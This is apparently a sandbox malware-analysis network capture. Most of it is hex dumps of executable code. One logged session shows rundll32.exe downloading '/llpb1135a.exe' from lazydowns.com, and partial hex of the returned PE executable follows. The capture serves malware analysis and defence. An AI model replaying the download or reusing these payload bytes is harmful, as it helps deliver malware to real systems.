                                                                                                                                                                                    2023-01-05 07:58:31 UTC10686INData Raw: 10 72 2c 8b 4d bc 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 a1 00 00 00 52 51 e8 99 04 01 00 83 c4 08 8b 95 40 ff ff ff c7 45 cc 00 00 00 00 c7 45 d0 0f 00 00 00 c6 45 bc 00 83 fa 10 72 2b 8b 8d 2c ff ff ff 42 8b c1 81 fa 00 10 00 00 72 10 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 77 59 52 51 e8 51 04 01 00 83 c4 08 8b 55 ec 83 fa 10 72 28 8b 4d d8 42 8b c1 81 fa 00 10 00 00 72 10 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 77 2e 52 51 e8 21 04 01 00 83 c4 08 8b 4d f4 64 89 0d 00 00 00 00 59 5e 8b 4d f0 33 cd e8 96 fd 00 00 8b e5 5d c3 e8 57 4a 01 00 e8 52 4a 01 00 e8 4d 4a 01 00 cc 55 8b ec 6a ff 68 f0 a8 42 00 64 a1 00 00 00 00 50 83 ec 5c a1 0c a0 43 00 33 c5 89 45 f0 53 56 57 50 8d 45 f4 64 a3 00 00 00 00 c7 45 fc
                                                                                                                                                                                    Data Ascii: r,MBrI#+RQ@EEEr+,BrI#+wYRQQUr(MBrI#+w.RQ!MdY^M3]WJRJMJUjhBdP\C3ESVWPEdE
                                                                                                                                                                                    2023-01-05 07:58:31 UTC10702INData Raw: 83 f8 1f 0f 87 5d 01 00 00 52 51 e8 b5 c4 00 00 83 c4 08 8b 95 1c fb ff ff c7 85 78 fe ff ff 00 00 00 00 c7 85 7c fe ff ff 0f 00 00 00 c6 85 68 fe ff ff 00 83 fa 10 72 2f 8b 8d 08 fb ff ff 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 08 01 00 00 52 51 e8 60 c4 00 00 83 c4 08 8b 95 e0 fe ff ff 83 fa 10 72 2f 8b 8d cc fe ff ff 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 d3 00 00 00 52 51 e8 26 c4 00 00 83 c4 08 8b 95 c8 fe ff ff 83 fa 10 72 2f 8b 8d b4 fe ff ff 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 99 00 00 00 52 51 e8 ec c3 00 00 83 c4 08 8b 95 b0 fe ff ff 83 fa 10 72 2b 8b 8d 9c fe ff ff 42 8b c1 81 fa 00 10 00 00 72 10 8b 49 fc 83 c2 23 2b
                                                                                                                                                                                    Data Ascii: ]RQx|hr/BrI#+RQ`r/BrI#+RQ&r/BrI#+RQr+BrI#+
                                                                                                                                                                                    2023-01-05 07:58:31 UTC10718INData Raw: 83 c2 23 2b c1
                                                                                                                                                                                    Data Ascii: #+
                                                                                                                                                                                    2023-01-05 07:58:31 UTC10718INData Raw: 83 c0 fc 83 f8 1f 0f 87 a8 01 00 00 52 51 e8 b2 84 00 00 83 c4 08 8b 55 4c c7 45 30 00 00 00 00 c7 45 34 0f 00 00 00 c6 45 20 00 83 fa 10 72 2c 8b 4d 38 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 62 01 00 00 52 51 e8 6c 84 00 00 83 c4 08 8b 55 64 c7 45 48 00 00 00 00 c7 45 4c 0f 00 00 00 c6 45 38 00 83 fa 10 72 2c 8b 4d 50 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 1c 01 00 00 52 51 e8 26 84 00 00 83 c4 08 8b 55 7c c7 45 60 00 00 00 00 c7 45 64 0f 00 00 00 c6 45 50 00 83 fa 10 72 2c 8b 4d 68 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 d6 00 00 00 52 51 e8 e0 83 00 00 83 c4 08 8b 95 94 00 00 00 c7 45 78 00 00 00 00 c7 45 7c 0f 00 00 00 c6 45 68
                                                                                                                                                                                    Data Ascii: RQULE0E4E r,M8BrI#+bRQlUdEHELE8r,MPBrI#+RQ&U|E`EdEPr,MhBrI#+RQExE|Eh
                                                                                                                                                                                    2023-01-05 07:58:32 UTC10734INData Raw: 00 83 fa 10 72 2f 8b 8d 18 fc ff ff 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 9a 0b 00 00 52 51 e8 93 44 00 00 83 c4 08 8b 95 14 fc ff ff c7 85 28 fc ff ff 00 00 00 00 c7 85 2c fc ff ff 0f 00 00 00 c6 85 18 fc ff ff 00 83 fa 10 72 2f 8b 8d 00 fc ff ff 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 45 0b 00 00 52 51 e8 3e 44 00 00 83 c4 08 8b 95 fc fb ff ff c7 85 10 fc ff ff 00 00 00 00 c7 85 14 fc ff ff 0f 00 00 00 c6 85 00 fc ff ff 00 83 fa 10 72 2f 8b 8d e8 fb ff ff 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 f0 0a 00 00 52 51 e8 e9 43 00 00 83 c4 08 8b 95 e4 fb ff ff c7 85 f8 fb ff ff 00 00 00 00 c7 85 fc fb ff ff 0f 00 00 00 c6 85 e8 fb ff ff
                                                                                                                                                                                    Data Ascii: r/BrI#+RQD(,r/BrI#+ERQ>Dr/BrI#+RQC
                                                                                                                                                                                    2023-01-05 07:58:32 UTC10750INData Raw: 35 20 b7 43 00 85 f6 74 19 ff 75 08 8b ce 68 08 b7 43 00 68 00 b7 43 00 ff 15 64 02 43 00 ff d6 eb 24 be 08 b7 43 00 56 ff 15 30 01 43 00 6a 00 ff 75 08 ff 35 04 b7 43 00 ff 15 44 01 43 00 56 ff 15 2c 01 43 00 5e 5d c3 55 8b ec 6a 00 ff 15 54 01 43 00 ff 75 08 ff 15 50 01 43 00 68 09 04 00 c0 ff 15 58 01 43 00 50 ff 15 5c 01 43 00 5d c3 55 8b ec 81 ec 24 03 00 00 6a 17 e8 b3 08 01 00 85 c0 74 05 6a 02 59 cd 29 a3 28 b8 43 00 89 0d 24 b8 43 00 89 15 20 b8 43 00 89 1d 1c b8 43 00 89 35 18 b8 43 00 89 3d 14 b8 43 00 66 8c 15 40 b8 43 00 66 8c 0d 34 b8 43 00 66 8c 1d 10 b8 43 00 66 8c 05 0c b8 43 00 66 8c 25 08 b8 43 00 66 8c 2d 04 b8 43 00 9c 8f 05 38 b8 43 00 8b 45 00 a3 2c b8 43 00 8b 45 04 a3 30 b8 43 00 8d 45 08 a3 3c b8 43 00 8b 85 dc fc ff ff c7 05 78
                                                                                                                                                                                    Data Ascii: 5 CtuhChCdC$CV0Cju5CDCV,C^]UjTCuPChXCP\C]U$jtjY)(C$C CC5C=Cf@Cf4CfCfCf%Cf-C8CE,CE0CE<Cx
                                                                                                                                                                                    2023-01-05 07:58:32 UTC10766INData Raw: fc 8b 45 08 53 8b 5d 10 56 8b 75 14 57 53 89 45 c4 ff 15 bc 01 43 00 8b c8 33 c0 81 e1 ff 7f ff ff 40 3b c8 0f 85 b2 00 00 00 66 89 46 08 33 ff 8b 45 c4 85 c0 74 20 8d 4d c0 89 7d c0 51 50 e8 21 03 00 00 59 59 84 c0 0f 84 a7 00 00 00 8b 45 c0 48 89 46 10 89 06 6a 34 8d 45 c8 57 50 e8 ae d4 ff ff 83 c4 0c 8d 45 c8 50 53 ff 15 b8 01 43 00 85 c0 0f 84 80 00 00 00 8b 45 c4 50 ff 75 c8 e8 32 02 00 00 57 57 ff 75 e0 66 89 46 06 ff 75 dc e8 c9 00 00 00 52 50 ff 75 d8 89 46 20 ff 75 d4 89 56 24 e8 b6 00 00 00 ff 76 24 89 46 18 ff 76 20 89 56 1c ff 75 d0 ff 75 cc e8 9f 00 00 00 89 46 28 8d 46 14 50 8d 45 c8 89 56 2c 50 e8 b1 01 00 00 83 c4 40 84 c0 75 73 eb 19 83 f9 02 74 27 83 f9 03 74 22 85 c9 75 0f e8 42 05 00 00 c7 00 09 00 00 00 32 c0 eb 57 ff 15 40 00 43 00
                                                                                                                                                                                    Data Ascii: ES]VuWSEC3@;fF3Et M}QP!YYEHFj4EWPEPSCEPu2WWufFuRPuF uV$v$Fv VuuF(FPEV,P@ust't"uB2W@C
                                                                                                                                                                                    2023-01-05 07:58:32 UTC10782INData Raw: 00 80 79 07 48 83 c8 fc 83 c0 01 75 0e 56 6a 64 8b c1 5e 99 f7 fe 5e 85 d2 75 12 8d 81 6c 07 00 00 b9 90 01 00 00 99 f7 f9 85 d2 75 04 b0 01 5d c3 32 c0 5d c3 8b ff 55 8b ec 83 ec 44 a1 0c a0 43 00 33 c5 89 45 fc 53 8b 5d 0c 56 57 8b 7d 08 81 c7 94 f8 ff ff 83 ff 46 0f 8c 79 01 00 00 81 ff 4d 04 00 00 0f 87 6d 01 00 00 8d 43 ff 83 f8 0b 0f 87 61 01 00 00 ff 75 10 50 57 e8 83 01 00 00 83 c4 0c 84 c0 0f 84 4c 01 00 00 83 7d 14 17 0f 87 42 01 00 00 83 7d 18 3b 0f 87 38 01 00 00 83 7d 1c 3b 0f 87 2e 01 00 00 8b 34 9d 80 46 43 00 03 75 10 57 e8 39 ff ff ff 59 84 c0 74 06 83 fb 02 7e 01 46 e8 ef 4d 00 00 33 c0 89 45 c4 89 45 c8 89 45 cc 8d 45 c4 50 e8 e9 45 00 00 59 85 c0 0f 85 10 01 00 00 8d 45 c8 50 e8 03 46 00 00 59 85 c0 0f 85 fe 00 00 00 8d 45 cc 50 e8 1d
                                                                                                                                                                                    Data Ascii: yHuVjd^^ulu]2]UDC3ES]VW}FyMmCauPWL}B};8};.4FCuW9Yt~FM3EEEEPEYEPFYEP
                                                                                                                                                                                    2023-01-05 07:58:32 UTC10798INData Raw: 68 55 0d 00 00 8d 8d f8 eb ff ff 51 8d 8d 50 f9 ff ff 2b c1 d1 f8 50 8b c1 50 6a 00 68 e9 fd 00 00 e8 7a d7 ff ff 8b 75 08 83 c4 20 89 85 e8 eb ff ff 85 c0 74 51 33 db 85 c0 74 35 6a 00 8d 8d ec eb ff ff 2b c3 51 50 8d 85 f8 eb ff ff 03 c3 50 ff b5 f0 eb ff ff ff 15 bc 00 43 00 85 c0 74 26 03 9d ec eb ff ff 8b 85 e8 eb ff ff 3b d8 72 cb 8b c7 2b 45 10 89 46 04 3b bd f4 eb ff ff 0f 82 46 ff ff ff eb 08 ff 15 40 00 43 00 89 06 8b 4d fc 8b c6 5f 5e 33 cd 5b e8 b5 3d ff ff c9 c3 6a 10 68 40 8f 43 00 e8 75 4a ff ff 8b 75 08 83 fe fe 75 18 e8 65 85 ff ff 83 20 00 e8 70 85 ff ff c7 00 09 00 00 00 e9 b3 00 00 00 85 f6 0f 88 93 00 00 00 3b 35 e8 c0 43 00 0f 83 87 00 00 00 8b de c1 fb 06 8b c6 83 e0 3f 6b c8 38 89 4d e0 8b 04 9d e8 be 43 00 f6 44 08 28 01 74 69 56
                                                                                                                                                                                    Data Ascii: hUQP+PPjhzu tQ3t5j+QPPCt&;r+EF;F@CM_^3[=jh@CuJuue p;5C?k8MCD(tiV
                                                                                                                                                                                    2023-01-05 07:58:32 UTC10814INData Raw: 00 83 c4 18 68 ff ff 00 00 ff b5 7c ff ff ff e8 96 dc ff ff 83 3e 08 59 59 74 14 e8 af 57 ff ff 84 c0 74 0b 56 e8 cc 57 ff ff 59 85 c0 75 08 ff 36 e8 2e 06 00 00 59 8b 4d fc 5f 33 cd 5e e8 10 fe fe ff 8b e5 5d 8b e3 5b c3 8b ff 55 8b ec 51 51 dd 45 08 d9 fc dd 5d f8 dd 45 f8 c9 c3 8b ff 55 8b ec 8b 45 08 a8 20 74 04 6a 05 eb 17 a8 08 74 05 33 c0 40 5d c3 a8 04 74 04 6a 02 eb 06 a8 01 74 05 6a 03 58 5d c3 0f b6 c0 83 e0 02 03 c0 5d c3 8b ff 53 8b dc 51 51 83 e4 f0 83 c4 04 55 8b 6b 04 89 6c 24 04 8b ec 81 ec 88 00 00 00 a1 0c a0 43 00 33 c5 89 45 fc 56 8b 73 20 8d 43 18 57 56 50 ff 73 08 e8 95 00 00 00 83 c4 0c 85 c0 75 26 83 65 c0 fe 50 8d 43 18 50 8d 43 10 50 ff 73 0c 8d 43 20 ff 73 08 50 8d 45 80 50 e8 7c 02 00 00 8b 73 20 83 c4 1c ff 73 08 e8 5e ff ff
                                                                                                                                                                                    Data Ascii: h|>YYtWtVWYu6.YM_3^][UQQE]EUE tjt3@]tjtjX]]SQQUkl$C3EVs CWVPsu&ePCPCPsC sPEP|s s^
                                                                                                                                                                                    2023-01-05 07:58:32 UTC10830INData Raw: cc 8b 0d 70 b4 43 00 83 f9 10 72 2a a1 5c b4 43 00 41 81 f9 00 10 00 00 72 12 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 77 28 8b c2 51 50 e8 92 c4 fe ff 83 c4 08 c7 05 6c b4 43 00 00 00 00 00 c7 05 70 b4 43 00 0f 00 00 00 c6 05 5c b4 43 00 00 c3 e9 c6 0a ff ff cc cc cc cc cc cc cc cc cc cc 8b 0d 60 b5 43 00 83 f9 10 72 2a a1 4c b5 43 00 41 81 f9 00 10 00 00 72 12 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 77 28 8b c2 51 50 e8 32 c4 fe ff 83 c4 08 c7 05 5c b5 43 00 00 00 00 00 c7 05 60 b5 43 00 0f 00 00 00 c6 05 4c b5 43 00 00 c3 e9 66 0a ff ff cc cc cc cc cc cc cc cc cc cc 8b 0d a8 af 43 00 83 f9 10 72 2a a1 94 af 43 00 41 81 f9 00 10 00 00 72 12 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 77 28 8b c2 51 50 e8 d2 c3 fe ff 83 c4 08 c7 05 a4 af 43 00 00 00 00
                                                                                                                                                                                    Data Ascii: pCr*\CArP#+w(QPlCpC\C`Cr*LCArP#+w(QP2\C`CLCfCr*CArP#+w(QPC
                                                                                                                                                                                    2023-01-05 07:58:32 UTC10846INData Raw: 45 78 69 74 50 72 6f 63 65 73 73 00 00 2e 00 65 00 78 00 65 00 00 00 00 00 2e 00 63 00 6d 00 64 00 00 00 00 00 2e 00 62 00 61 00 74 00 00 00 00 00 2e 00 63 00 6f 00 6d 00 00 00 00 00 2e 00 2f 00 5c 00 00 00 00 00 00 00 01 00 00 00 16 00 00 00 02 00 00 00 02 00 00 00 03 00 00 00 02 00 00 00 04 00 00 00 18 00 00 00 05 00 00 00 0d 00 00 00 06 00 00 00 09 00 00 00 07 00 00 00 0c 00 00 00 08 00 00 00 0c 00 00 00 09 00 00 00 0c 00 00 00 0a 00 00 00 07 00 00 00 0b 00 00 00 08 00 00 00 0c 00 00 00 16 00 00 00 0d 00 00 00 16 00 00 00 0f 00 00 00 02 00 00 00 10 00 00 00 0d 00 00 00 11 00 00 00 12 00 00 00 12 00 00 00 02 00 00 00 21 00 00 00 0d 00 00 00 35 00 00 00 02 00 00 00 41 00 00 00 0d 00 00 00 43 00 00 00 02 00 00 00 50 00 00 00 11 00 00 00 52 00 00 00 0d 00
                                                                                                                                                                                    Data Ascii: ExitProcess.exe.cmd.bat.com./\!5ACPR
                                                                                                                                                                                    2023-01-05 07:58:32 UTC10862INData Raw: 3f 00 00 00 00 c0 e4 ce 3f 00 00 00 00 c0 e4 ce 3f 00 00 00 00 60 9f ce 3f 00 00 00 00 60 9f ce 3f 00 00 00 00 00 5a ce 3f 00 00 00 00 00 5a ce 3f 00 00 00 00 90 1b ce 3f 00 00 00 00 90 1b ce 3f 00 00 00 00 30 d6 cd 3f 00 00 00 00 30 d6 cd 3f 00 00 00 00 c0 97 cd 3f 00 00 00 00 c0 97 cd 3f 00 00 00 00 50 59 cd 3f 00 00 00 00 50 59 cd 3f 00 00 00 00 e0 1a cd 3f 00 00 00 00 e0 1a cd 3f 00 00 00 00 60 e3 cc 3f 00 00 00 00 60 e3 cc 3f 00 00 00 00 f0 a4 cc 3f 00 00 00 00 f0 a4 cc 3f 00 00 00 00 70 6d cc 3f 00 00 00 00 70 6d cc 3f 00 00 00 00 00 2f cc 3f 00 00 00 00 00 2f cc 3f 00 00 00 00 80 f7 cb 3f 00 00 00 00 80 f7 cb 3f 00 00 00 00 00 c0 cb 3f 00 00 00 00 00 c0 cb 3f 00 00 00 00 00 00 e0 3f 14 00 00 00 70 49 43 00 1d 00 00 00 74 49 43 00 1a 00 00 00 64 49
                                                                                                                                                                                    Data Ascii: ???`?`?Z?Z???0?0???PY?PY???`?`???pm?pm?/?/??????pICtICdI
                                                                                                                                                                                    2023-01-05 07:58:32 UTC10878INData Raw: 00 16 98 03 00 10 02 03 00 54 93 03 00 00 00 00 00 00 00 00 00 c2 98 03 00 44 02 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 da 96 03 00 ca 96 03 00 b6 96 03 00 a6 96 03 00 94 96 03 00 84 96 03 00 6a 96 03 00 5a 96 03 00 44 96 03 00 00 00 00 00 16 96 03 00 06 96 03 00 f0 95 03 00 e0 95 03 00 30 96 03 00 00 00 00 00 78 94 03 00 88 94 03 00 9e 94 03 00 ac 94 03 00 ba 94 03 00 ca 94 03 00 da 94 03 00 e6 94 03 00 fa 94 03 00 0c 95 03 00 6c 94 03 00 2a 95 03 00 3e 95 03 00 52 95 03 00 64 95 03 00 76 95 03 00 8a 95 03 00 3a 9e 03 00 2a 9e 03 00 1a 9e 03 00 0c 9e 03 00 00 9e 03 00 5c 94 03 00 54 94 03 00 3c 94 03 00 28 94 03 00 02 94 03 00 18 94 03 00 f2 93 03 00 e2 93 03 00 d2 93 03 00 c6 93 03 00 b8 93 03 00 ac 93 03 00 96 93 03 00 80 93
                                                                                                                                                                                    Data Ascii: TDjZD0xl*>Rdv:*\T<(
                                                                                                                                                                                    2023-01-05 07:58:32 UTC10894INData Raw: 39 57 39 61 39 6b 39 82 39 8c 39 b7 39 c1 39 cb 39 e2 39 ec 39 17 3a 21 3a 2b 3a 42 3a 4c 3a 77 3a 81 3a 8b 3a a2 3a ac 3a d7 3a e1 3a eb 3a 02 3b 0c 3b 37 3b 41 3b 4b 3b 62 3b 6c 3b 97 3b a1 3b ab 3b c2 3b cc 3b f7 3b 01 3c 0b 3c 22 3c 2c 3c 57 3c 61 3c 6b 3c 82 3c 8c 3c b7 3c c1 3c cb 3c e2 3c ec 3c 17 3d 21 3d 2b 3d 42 3d 4c 3d 77 3d 81 3d 8b 3d a2 3d ac 3d d7 3d e1 3d eb 3d 02 3e 0c 3e 37 3e 41 3e 4b 3e 62 3e 6c 3e 97 3e a1 3e ab 3e c2 3e cc 3e f7 3e 01 3f 0b 3f 22 3f 2c 3f 57 3f 61 3f 6b 3f 82 3f 8c 3f b7 3f c1 3f cb 3f e2 3f ec 3f 00 e0 02 00 b4 01 00 00 17 30 21 30 2b 30 42 30 4c 30 77 30 81 30 8b 30 a2 30 ac 30 d7 30 e1 30 eb 30 02 31 0c 31 37 31 41 31 4b 31 62 31 6c 31 97 31 a1 31 ab 31 c2 31 cc 31 f7 31 01 32 0b 32 22 32 2c 32 57 32 61 32 6b 32
                                                                                                                                                                                    Data Ascii: 9W9a9k99999999:!:+:B:L:w::::::::;;7;A;K;b;l;;;;;;;<<"<,<W<a<k<<<<<<<<=!=+=B=L=w========>>7>A>K>b>l>>>>>>>??"?,?W?a?k????????0!0+0B0L0w000000001171A1K1b1l111111122"2,2W2a2k2


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    41192.168.2.44974768.65.123.54443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:58:35 UTC10898OUTGET /llpb1135a.exe HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Host: lazydowns.com


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    4268.65.123.54443192.168.2.449747C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:58:35 UTC10899INHTTP/1.1 200 OK
                                                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                                                    content-type: application/x-msdownload
                                                                                                                                                                                    last-modified: Tue, 03 Jan 2023 22:05:32 GMT
                                                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                                                    content-length: 3909632
                                                                                                                                                                                    date: Thu, 05 Jan 2023 07:58:35 GMT
                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                    connection: close
                                                                                                                                                                                    2023-01-05 07:58:36 UTC10899INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 84 a6 b4 63 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 9e 3b 00 00 08 00 00 00 00 00 00 3e bc 3b 00 00 20 00 00 00 c0 3b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 3c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc;>; ;@ <@
                                                                                                                                                                                    2023-01-05 07:58:36 UTC10915INData Raw: 50 34 ff c7 a0 cc ff 9d ff 65 64 68 43 73 89 f2 98 cf ff 8a 85 b7 0f e0 dc 72 00 32 6a 62 ff 07 54 3e 50 8c b5 d7 fe ce ff 8a 15 bf 00 27 00 41 c0 f5 85 fe fe 8f ff 68 00 73 00 11 3b 76 06 06 50 44 db e9 0c 41 03 7c 3c 08 00 8f b1 60 01 73 00 fc 81 3d 01 75 00 74 c6 34 8b f3 04 33 00 62 03 f5 98 96 ff 8c 50 88 b5 91 fe 8a ff 88 15 ac 00 31 00 b9 8d fe fe 8f ff e5 5b 5b 0f c0 47 37 41 fc 8d eb fe 9b ff 49 c8 4e b8 e9 9d e4 fe 97 ff 19 00 1d 04 bc 47 41 50 fc 83 c0 00 72 00 b1 c0 6a 50 8f b5 c8 fe 8c ff 88 15 f9 00 36 00 fc 47 4c 03 f7 98 cc ff 9d 53 f9 83 d8 00 73 00 88 b5 95 fe 8a ff 88 15 e4 00 31 00 cd b5 c6 fe 8f ff 97 15 df 00 34 00 59 00 f5 00 77 6a 64 56 8d 15 f2 00 21 00 2f 5e d8 01 28 8b 3a fc 02 cd 9d d9 31 01 64 8b 97 5d f1 68 62 80 70 00 02 00
                                                                                                                                                                                    Data Ascii: P4edhCsr2jbT>P'Ahs;vPDA|<`s=ut43bP1[[G7AINGAPrjP6GLSs14YwjdV!/^(:1d]hbp
                                                                                                                                                                                    2023-01-05 07:58:36 UTC10931INData Raw: 00 43 14 fe 49 8b 83 a6 23 59 c1 b1 c0 9e 83 88 1f 67 87 90 04 77 00 63 51 9d 21 79 01 64 83 b6 08 f4 45 9e 10 fb 55 84 c7 36 d0 77 00 31 00 b2 45 a3 0f 64 00 72 c6 77 c0 62 83 8a 10 1a 2c f8 4d af 42 ba c1 f4 fa 77 10 64 00 00 14 b9 49 9e 83 b2 23 43 c1 f0 c0 8b 83 c9 1f 7a 87 ee 04 64 00 20 51 da d7 6f 01 70 83 ac 08 b4 45 8b ff ce ff 8a 8b 22 bc a3 45 9a 00 32 00 62 c7 35 ec 67 00 73 00 b1 45 e9 00 f6 fa 67 72 48 8b 3f a8 70 8b a3 81 8a 00 78 00 73 72 63 8b 78 fc f6 c2 54 2b a5 83 b2 fc b1 f8 7d 0f f7 4c 6c 00 73 52 26 e8 bb 0d 74 00 f4 c4 6c 84 a9 74 3e 6a 63 68 f4 5f 2b 00 9a de 74 00 31 83 99 18 fc cc 0c fc df 43 32 e8 a6 ef 70 00 e5 4d db e8 5b ab ce ff fe f0 fa 4d bc c7 37 fc 20 00 62 00 98 cb b4 ff 8c 56 fc d0 f7 45 89 13 fa 4d a4 e8 de f5 32 00
                                                                                                                                                                                    Data Ascii: CI#YgwcQ!ydEU6w1Edrwb,MBwdI#Czd QopE"E2b5gsEgrH?pxsrcxT+}LlsR&tlt>jch_+t1C2pM[M7 bVEM2
                                                                                                                                                                                    2023-01-05 07:58:36 UTC10947INData Raw: ff 97 0f 73 00 77 c6 b4 20 8b ff 88 00 e7 fa 62 72 1d 8b ef 08 8e ff 97 42 f8 c1 f6 fa 31 10 75 00 05 14 ef 49 8e 83 f0 23 49 c1 f3 c0 94 83 8b 1f 78 87 98 0a 75 00 25 51 8c 01 bc 00 32 83 a6 08 fb 95 6c fe 8c ff b0 85 29 fe 8a ff 77 00 64 00 b5 85 2e fe 9d ff 7f 00 68 00 b5 85 7f fe ce ff 75 83 8d 10 16 2f f9 8d c2 fd 9d ff 32 8b a9 81 89 00 67 00 31 72 61 8b 3e fc e7 c2 51 2b f3 83 a2 fc f3 f8 77 0f f4 54 7d 00 31 52 24 e8 db cd 64 00 f1 c4 3a 8b f7 ec 8d ff 97 c7 f6 00 89 ff ce 00 75 00 77 c7 e1 04 8c ff cd 0f 62 00 70 c6 ed f0 8e ff 88 00 b2 fa 65 72 58 8b e9 d8 8f ff cd 42 e9 c1 f1 fa 68 10 73 00 05 14 ba 49 89 83 b5 23 4f c1 f1 c0 ce 83 9a 1f 7f 87 97 09 73 00 25 51 d9 57 b8 00 77 83 a0 08 f9 95 e6 fd 9d ff b7 85 80 fd 8c ff 77 00 31 00 b2 85 9b fd
                                                                                                                                                                                    Data Ascii: sw brB1uI#Ixu%Q2l)wd.hu/2g1ra>Q+wT}1R$d:uwbperXBhsI#Os%QWww1
                                                                                                                                                                                    2023-01-05 07:58:36 UTC10963INData Raw: 1c e9 45 7a 8b fe 50 8a bf 00 00 68 c6 36 fc 7e e8 d7 de 8a ff f4 bd b8 00 72 00 22 8d ef c8 70 00 68 8b e6 d8 77 00 31 0f 36 8d bf 00 64 00 18 01 5a 64 3d 43 70 e8 78 84 73 00 f6 c4 b1 00 75 00 f3 c0 6b 84 29 01 32 00 e1 ec 68 8d ed d8 88 ff 88 8b fd 89 d0 94 8c ff 9b 50 9a 6b 42 00 62 83 9c 18 ae 45 8f 1d fe a5 ad fb 8a ff fa 85 bc fb 8d ff b9 f4 e1 ec 68 8b a4 50 9b 4b 07 00 31 8b bb e8 63 59 9b ff f9 f4 f4 45 9e 1e f3 ec 70 8b bf 68 3b a9 72 00 9d 2f 07 00 64 8b bc e8 aa 2b 9d ff f3 c4 70 c6 36 fc 7e e8 7d 2e 8a ff f4 c4 2c e9 9f 00 32 00 eb a5 e4 fb 97 ff f0 ec 6f 8b fd 68 11 b5 34 00 8c ff 1d 00 32 8b ac e8 18 2b 97 ff b5 45 8b 1f ba cc fc a5 eb fb 9b ff 1a 24 9f 43 62 e8 92 6f 68 00 f0 ec 6f c6 74 fc 55 8d 32 50 ed a5 d2 fb cd ff e9 cc 20 e8 a2 6f
                                                                                                                                                                                    Data Ascii: EzPh6~r"phw16dZd=Cpxsuk)2hPkBbEhPK1cYEph;r/d+p6~}.,2oh42+E$CbohotU2P o
                                                                                                                                                                                    2023-01-05 07:58:36 UTC10979INData Raw: 10 31 00 75 00 b0 46 70 0f 72 00 32 8d 33 01 b6 06 68 8a 72 41 f3 c0 44 f9 5e ca fa 85 8c fe 8d ff 63 50 e9 ce 98 61 5d 00 73 8d fa 88 cc ff 8a e8 c1 31 9b ff f9 f4 f4 45 9e 05 fd 85 80 fd 8c ff fe b5 e9 fc 8a ff 27 8d e1 f0 8f ff cd c7 e7 e8 8d ff 97 00 72 00 77 50 5b 02 8a 15 df 00 27 00 41 c0 f5 85 82 fd 8f ff 68 00 73 00 fa 8d c1 fd 8a ff b0 85 80 fd 8d ff 35 00 62 00 16 89 ed d0 8e ff 88 8d 60 02 7a 1f 37 00 02 8b 73 83 f3 02 04 85 b0 75 9d 2b b9 8d f2 f0 cc ff 8a d1 8e 51 34 8d ff d0 cf ff 9d e8 3e 32 68 00 b5 45 8b 06 bc 95 a5 fd 88 ff e7 bd 96 fd cd ff 6a 8d ed d0 95 ff 8c 8b f2 e0 cc ff 8a 8b b9 0f 27 95 a2 fd cd ff 6d 43 ed d0 95 ff 8c c7 31 10 31 00 75 00 b0 46 70 0f 72 00 32 8d 66 42 b6 06 68 8b 8b 2b b4 d1 c9 50 9d f1 37 00 64 89 c7 dc ce ff
